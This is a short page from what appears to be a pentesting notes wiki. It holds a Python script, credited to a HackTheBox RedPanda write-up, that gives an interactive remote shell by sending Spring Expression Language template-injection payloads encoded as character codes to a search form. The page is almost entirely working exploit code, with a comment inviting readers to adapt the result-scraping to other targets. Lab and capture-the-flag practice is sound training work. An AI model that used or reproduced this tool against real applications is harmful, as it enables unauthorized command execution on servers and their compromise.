Automatic Tool

#!/usr/bin/python3
import requests
import sys
from cmd import Cmd
from bs4 import BeautifulSoup

url = "http://vulnerable.com:8080/search"

class RCE(Cmd):
    prompt = "\033[1;31m$\033[1;37m "
    def decimal(self, args):
        comando = args
        decimales = []

        for i in comando:
            decimales.append(str(ord(i)))
        payload = "*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)" % decimales[0]

        for i in decimales[1:]:
            payload += ".concat(T(java.lang.Character).toString({}))".format(i)

        payload += ").getInputStream())}"
        data = { "name": payload }
        requer = requests.post(str(url), data=data)
        parser = BeautifulSoup(requer.content, 'html.parser')
        # Edit this part in order to scrape your result.
        grepcm = parser.find_all("h2")[0].get_text()
        result = grepcm.replace('You searched for:','').strip()
        print(result)

    def default(self, args):
        try:
            self.decimal(args)
        except:
            print("%s: command not found" % (args))

RCE().cmdloop()

Code obtained from: https://gatogamer1155.github.io/hackthebox/redpanda/

PreviousWordlist NextActive Directory (Windows)

Last updated 3 years ago